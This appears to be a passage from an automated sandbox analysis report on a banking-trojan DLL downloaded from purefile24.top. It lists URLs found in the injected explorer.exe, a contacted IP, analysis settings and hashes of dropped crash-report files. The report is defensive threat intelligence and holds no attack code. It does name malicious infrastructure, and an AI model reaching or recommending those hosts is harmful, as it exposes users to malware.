                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://google.pchome.com.tw/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://uk.search.yahoo.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://search.sify.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.ebay.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.google.si/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.google.cz/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.soso.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.univision.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.ebay.it/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://auto.search.msn.com/response.asp?MT=explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.target.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://buscador.terra.es/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.typography.netDexplorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://fontfabrik.comexplorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown

                                                                                                                                        Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        185.212.47.223
                                                                                                                                        unknownSweden
                                                                                                                                        39378SERVINGADEfalse

                                                                                                                                        Private

                                                                                                                                        IP
                                                                                                                                        192.168.2.1

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                        Analysis ID:322850
                                                                                                                                        Start date:26.11.2020
                                                                                                                                        Start time:01:29:15
                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 9m 30s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:light
                                                                                                                                        Sample file name:https___purefile24.top_4352wedfoifom.php (renamed file extension from php to dll)
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                        Number of analysed new started processes analysed:37
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:3
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • HDC enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.bank.troj.spyw.evad.winDLL@47/62@3/2
                                                                                                                                        EGA Information:Failed
                                                                                                                                        HDC Information:
                                                                                                                                        • Successful, ratio: 47.1% (good quality ratio 40.8%)
                                                                                                                                        • Quality average: 69.9%
                                                                                                                                        • Quality standard deviation: 34.8%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        • Number of executed functions: 0
                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Adjust boot time
                                                                                                                                        • Enable AMSI
                                                                                                                                        Warnings:
                                                                                                                                        Show All
                                                                                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, WerFault.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 52.147.198.201, 104.43.139.144, 40.88.32.150, 104.83.120.32, 51.11.168.160, 52.155.217.156, 20.54.26.129, 152.199.19.161, 92.122.213.194, 92.122.213.247, 13.88.21.125, 40.126.1.142, 20.190.129.17, 40.126.1.145, 20.190.129.2, 40.126.1.128, 20.190.129.133, 20.190.129.160, 20.190.129.130, 93.184.220.29
                                                                                                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, updates5.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, ocsp.digicert.com, login.live.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, updates.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        TimeTypeDescription
                                                                                                                                        01:31:15API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                                                        01:31:40API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                                                                        01:31:40API Interceptor2x Sleep call for process: explorer.exe modified
                                                                                                                                        01:31:53API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        No context

                                                                                                                                        Domains

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        resolver1.opendns.comvnaSKDMnLG.dllGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        5fbce6bbc8cc4png.dllGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        fY9ZC2mGfd.exeGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        H58f3VmSsk.exeGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        2200.dllGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        5faabcaa2fca6rar.dllGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222
                                                                                                                                        YjimyNp5ma.exeGet hashmaliciousBrowse
                                                                                                                                        • 208.67.222.222

                                                                                                                                        ASN

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        SERVINGADEFlashPlayer.apkGet hashmaliciousBrowse
                                                                                                                                        • 185.158.251.215
                                                                                                                                        MicrosoftWord (1).apkGet hashmaliciousBrowse
                                                                                                                                        • 185.158.251.146

                                                                                                                                        JA3 Fingerprints

                                                                                                                                        No context

                                                                                                                                        Dropped Files

                                                                                                                                        No context

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_loaddll32.exe_5c36891a17d80e76ac9661865237f76ab3b96fe_f2262bc1_19f3d1d1\Report.wer
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):10282
                                                                                                                                        Entropy (8bit):3.7601627764698518
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:Mv2UeViaP7yYXAy9h4yf7lS6tpXIQcQvc6QcEDMcw3DS+a+z+HbHg/8BRTf3skEf:d6YBHBUZMX4jJa/u7sbS274Itbz
                                                                                                                                        MD5:82D81F82BB5F161F3EF251DA90CEB1C2
                                                                                                                                        SHA1:851402A67DB9ABC10C40E0CA6244F2C56557B3BE
                                                                                                                                        SHA-256:2A69CE06D418C20901AD560B93560DBE7648C844F1FC4A9BB7AB8407E5D28398
                                                                                                                                        SHA-512:ADB86D1FAA9CDCA451A574EF2B1D592612ED59D5845C0DE52EEADA59167D14EE2FBA0C0E959E60B3F99D591A3B385ED8F88FB9B45E9D99D8E63E25792BBCAFFC
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.8.2.4.3.0.5.1.6.0.7.0.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.8.2.4.3.1.1.6.1.3.8.1.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.e.6.3.e.f.2.-.1.6.4.6.-.4.6.f.c.-.8.9.3.a.-.3.a.1.5.a.b.9.d.c.2.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.1.2.6.f.d.b.-.d.0.0.6.-.4.d.5.b.-.b.4.2.0.-.c.3.9.6.5.8.4.9.0.d.b.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.8.8.-.0.0.0.1.-.0.0.1.b.-.7.5.8.e.-.d.c.4.7.8.b.c.3.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFD1.tmp.dmp
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Nov 26 00:31:46 2020, 0x1205a4 type
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):51456
                                                                                                                                        Entropy (8bit):2.2780259670678316
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:WZFUIvX/Q4sh6G5uqrko8HbSDEQqts5d+LUWOHpYb878LeSJAjiNVnIjEK:Q/Q46r5uqrX870C65d+opm878LeSzsEK
                                                                                                                                        MD5:D0DF79DB9FCFAD7690655BE64E23B87F
                                                                                                                                        SHA1:658BC22F805341C5051993E41263C9DEB1510390
                                                                                                                                        SHA-256:8B7BF0B7D39288F38CAA29240C02E1ECD4F59038F751F169D7A6F726B6F2FD74
                                                                                                                                        SHA-512:C3C50AA658693EFBC55B87DB6F12A3E278241DC6143DD4D21C8E4B6D4ABB924F4B5815C1469B6B967D35733C9AD45D3A2F38FC7AF21E9DF8B90D4F7C158FB20E
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: MDMP....... .......r.._...................U...........B......$.......GenuineIntelW...........T.............._.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB716.tmp.WERInternalMetadata.xml
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):8378
                                                                                                                                        Entropy (8bit):3.6928428391045958
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:Rrl7r3GLNiUja6Tnd6YrDSUn5gmfOSU+pre389bf/sfcVm:RrlsNiua6Td6YvSU5gmfOS2ofkfD
                                                                                                                                        MD5:F9FB9B84510B41011BA1520D1AE6A5CF
                                                                                                                                        SHA1:4BAB64FE5847240C30D1A7F973034842D6720C29
                                                                                                                                        SHA-256:0F0586C5D290285432EB2BDBB0E3522B2780BA431D72755B2B58F03E55747611
                                                                                                                                        SHA-512:9CAC205BF096AB229FFAEDDB9DCBCB2781ABDFECDF39C254AB882588F8AA14A6632F94687256C877D4155AEC2AE2B2658FB5686F9B8E29AF6CDFC9A04977AC16
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.3.6.<./.P.i.d.>.......
                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA91.tmp.xml
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4656
                                                                                                                                        Entropy (8bit):4.418106692505243
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:cvIwSD8zsAJgtWI9BVWSC8Bc8fm8M4JDzFcI+q8vhBKcQIcQwvtbd:uITfGSkSNLJaIK3Kkwvtbd
                                                                                                                                        MD5:4218FB51421683A4DDFC8F83050E8721
                                                                                                                                        SHA1:85C562054C6F5231F82EEE0F23C504C82DBC2C33
                                                                                                                                        SHA-256:4BA5DC5A4A02FD59D3D6A174F6F8E43BD371A6D42B8C06CB0801A4453B059E03
                                                                                                                                        SHA-512:5A7606C33E680EAE535A2B6A43AA5AA585B31281729D034A22AA53163821DD9DF3F101FA67D0EF9F8517E945B65E04DD090549E30175C1C7E399C2C4DD26D86C
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="745062" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8E9E2BBA-2F7E-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:Microsoft Word Document
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):29272
                                                                                                                                        Entropy (8bit):1.7687576010351826
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:rZZSZ4279Wztoif6g6zMcPyR6zuBr9xpB:rPOv7UxVDnn
                                                                                                                                        MD5:A057CB53AF5206CA4B21282FD8015265
                                                                                                                                        SHA1:4216B5B681F313BC9DD08E99CFEDD0B744230F9D
                                                                                                                                        SHA-256:17C6ACC8D09A8906FABEA19AD46FB1F1A666C908955BBD0350DBB81F1652C458
                                                                                                                                        SHA-512:272A88642696E3D903D3B8DF115DFC5D8FCE0D1C0FAFB320B69DD5777068E665F8A02F8E97F090656303A84FFD9D80BEBF29F3ADA9DE34945FADDB594228C834
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A8EB16E1-2F7E-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:Microsoft Word Document
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):71272
                                                                                                                                        Entropy (8bit):2.040101701776949
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:raZpZm2A9Wct2ifavhzMGp+64tBvKptnFasoS8VtfONdh9s8GHhpJHNuzGHNHnOi:rG/dAUoHHnI9IzzHFr9n
                                                                                                                                        MD5:AC8E06B67F44790E4E8F38F7DB8A06BD
                                                                                                                                        SHA1:17FA9FC7EC5F8EEEA497B4D4FB814A0510F1DA65
                                                                                                                                        SHA-256:C857B05126FFA0BC811D1ACB23B08F5BA2AE8307F748E1C3A7A0320AA5D2A6A9
                                                                                                                                        SHA-512:3DECBEF0364807A2C1341E0772E6C3C76B410ACAE3BF73A2429682B561FB89FB3817F3652226A85648B99EAA0E8BB5B9A9B64549D80C26EA972CDE68AE1637ED
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8E9E2BBC-2F7E-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:Microsoft Word Document
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):27384
                                                                                                                                        Entropy (8bit):1.8496965984125495
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:rUZ7QD6dkcFj924kWgMbYyDoluERDolu2lqSA:rEUmGch081bXDoHDodQl
                                                                                                                                        MD5:3B4C851D23ECFEEED314F42E31B65905
                                                                                                                                        SHA1:CC264E5829CE13D406A389C3280CF84C422A5C06
                                                                                                                                        SHA-256:DA69BCA4D86FAE8EBD5064CB36CE333215B425804A57C395748E6A4F71DDA0D6
                                                                                                                                        SHA-512:6189D50D8EEF16DF77614C42B271B44F544306ADECE76774DAA03C5DB6C0B61EFED0DB766BDBCC508A075D22E51802FBAA14C153CD790E3B7C30A557D6112EB5
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A8EB16E3-2F7E-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:Microsoft Word Document
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):27376
                                                                                                                                        Entropy (8bit):1.8476409943924677
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:r1ZdQV6zkbFjR2PkWYMPY6poUixpoUuoG6A:r7iA4bhA79Pv2F2cG9
                                                                                                                                        MD5:023CFAC5DBB6020979EBDCEE779A8211
                                                                                                                                        SHA1:04DE1B108DD42596B370FCA39D86A84AE935A860
                                                                                                                                        SHA-256:AC48BC89C96CE9BDCCBEB5D3C7FB237639FD2BEC411EB8AACCB99C6A37DDA600
                                                                                                                                        SHA-512:5CC63CFEDB920C3C35C7FD9FB6591F0D24CD159487A80B224C70D1E37B41719D24EF3ACF9C02AB0BE7BF1900910AE805814EDAA17991B0D36BAAF27D02B3B220
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
